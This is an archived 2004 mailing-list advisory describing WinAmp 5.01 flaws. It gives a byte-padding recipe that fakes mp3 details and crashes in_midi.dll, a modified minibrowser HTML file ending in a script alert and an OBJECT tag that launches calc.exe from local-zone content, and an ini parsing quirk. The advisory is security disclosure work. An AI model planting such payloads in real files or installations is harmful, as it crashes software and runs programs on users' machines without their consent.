[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000001c41240$b088d1a0$cb4db350@fucku>
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: WinAmp <=5.01 - Multiple Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Software: WinAmp
Vendor: NullSoft
http://www.nullsoft.com
http://www.winamp.com
Versions: <=5.01
Platforms: Windows
Bug: Multiple Vulnerabilities
Risk: Medium
Exploitation: Local
Date: 25 Feb 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bug
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Winamp is more than just a player. It's your window to the multimedia world.
>From MP3s to streaming video, Winamp is the one place you go to feed your
audio/video habit. Winamp is one of the world's most common audio/video file
players.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Faking File Details:
--------------------------
Adding a lot of '01' chars to the *BEGINING* of a mp3 file, will create fake
file details.
The length of the mp3 will increase, it will be considered
copyrighted,original, with a lot of frames and
with invalid Emphasis. The song will also be loaded with delay.
Example:
Size: 123136633 bytes
Header found at: 7122 bytes
Length: 2565 seconds
MPEG 1.0 layer 1
384kbit, 98273 frames
44100Hz 2 Channel
CRCs: No
Copyrighted: Yes
Original: Yes
Emphasis: invalid
Adding a lot of '01' chars to the *END* of a mp3 file, will create different
fake file details.
The bitrate of the mp3 will increase, the mhz will decrease and upon play
the .
Example:
Size: 123136873 bytes
Header found at: 4266 bytes
Length: 3420 seconds
MPEG 1.0 layer 1
288kbit, 95013 frames
32000Hz Stereo
CRCs: No
Copyrighted: No
Original: No
Emphasis: CITT j.17
Crash/Buffer Overflow:
------------------------------
Changing an midified mp3 file's extention to ".mid" will cause a CRASH/
BUFFER OVERFLOW at "in_midi.dll".
Crash/Overflow = [choose a number] x '\x01' + [original mp3 file content] +
[choose a number] x '\x01' + ".mid".
screen capture: http://theinsider.deep-ice.com/images/winampbof.jpg
screen capture: http://theinsider.deep-ice.com/images/winampbof2.jpg
A similar overflow had been found in the past by coresecurity. This overflow
does not allow
code excution. It is a Null Pointer Crash. Can be seen clearly when adding a
"bugged" file
using the "add --> dir" function. (the dir must contain more regular mp3
files)
Minibrowser Copromise:
----------------------------------
Winamp minibrowser (alt+T)/(alt+L) loading "winampmb.htm" as default.
Anyone can modify the "winampmb.htm" to have scripts, winamp runs this file
with "LocalZone" access.
Example of a modified "winampmb.htm" :
-------------- CUT HERE ----------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Winamp's Minibrowser</title>
</head>
<style type="text/css">
<!--
a:link
{
color:#0000FF;
}
a:visited
{
color:#0000FF;
}
a:hover
{
color:red;
}
a.test:link
{
color:red;
}
BODY
{
background-color: #FFFFFF;
font-family: Arial, Helvetica;
color:black;
}
.default
{
font-size:10pt;
}
.logo
{
font-family: Arial Black, Arial, Helvetica;
font-size: 13pt;
color: #FFC800;
filter: glow(color=#000000, strength=2);
height:1;
}
-->
</style>
<body topmargin="0" leftmargin="0" rightmargin="0" marginheight="0"
marginheight="0">
<table cellpadding="0" cellspacing="0" width="100%">
<tr><td style="background-color:#800000;" nowrap>
<div class="coffee logo"> WINAMP</div>
<div class="coffee logo"
style="margin-top: -24px;"> WINAMP</div>
<div class="coffee logo"
style="margin-top: -24px;"> WINAMP</div>
</td></tr>
<tr><td style="background-color:#FFC800;"
nowrap><table></table></td></tr>
</table>
<table width="96%" align="center">
<tr><td height="5" nowrap><table></table></td></tr>
<tr><td class="default">Welcome to the Minibrowser, connect to the
internet and check out the cool links below.</td></tr>
<tr><td height="5" nowrap><table></table></td></tr>
</table>
<table width="93%" cellpadding="5" cellspacing="0" style="border: 1px solid
#DDDDDD;" align="center">
<tr>
<td style="border: 1px solid #DDDDDD;background-color:#F7F7F7;">
<table cellpadding="0" cellspacing="0" border="0"
class="default">
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.shoutcast.com/waradio.phtml" target="outside"><b>Winamp
Radio</b></a></div>Free MP3 Internet Radio that you control.</td>
</tr>
<tr><td height="10" nowrap><table></table></td></tr>
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/skins/" target="outside"><b>Free
Skins</b></a></div>Give your Winamp a new look and feel.</td>
</tr>
<tr><td height="10" nowrap><table></table></td></tr>
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/plugins/" target="outside"><b>Free
Plug-ins</b></a></div>Add to what your Winamp can do. Add games, ability to
play new files, and more!</td>
</tr>
<tr><td height="10" nowrap><table></table></td></tr>
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/music/?mb=1" target="outside"><b>Grab Some
Music</b></a></div>Get some tunes from our sponsors, it's all free!</td>
</tr>
</table>
</td>
</tr>
</table>
<div align="center" class="default" style="font-size:.6em;">Copyright <a
href="http://www.nullsoft.com" target="outside">Nullsoft Inc.</a>
1997-2001</div>
</body>
</html>
<script>alert('xss')</script><OBJECT
CLASSID="CLSID:10000000-0000-0000-0000-000000000000"
CODEBASE="C:\windows\system32\calc.exe"></OBJECT>
-------------- CUT HERE ----------------
Bugs:
-------
WinAmp/ini: If an empty value is located at "RecentURL1=" or if it
doesn't exsist then Winamp ignores the rest of the urls...
Example:
RecentURL1=
RecentURL2=http://www.server2.com:8080
RecentURL3=http://www.server3.com:8080
RecentURL4=http://www.server4.com:8080
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Fake MP3 file details = 10000 x '\x01' + [original mp3 file content] +
10000 x '\x01'.
Crash/Overflow = 10000 x '\x01' + [original mp3 file content] + 10000 x
'\x01' + ".mid".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider - advisory#38.txt
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
Powered by blists - more mailing lists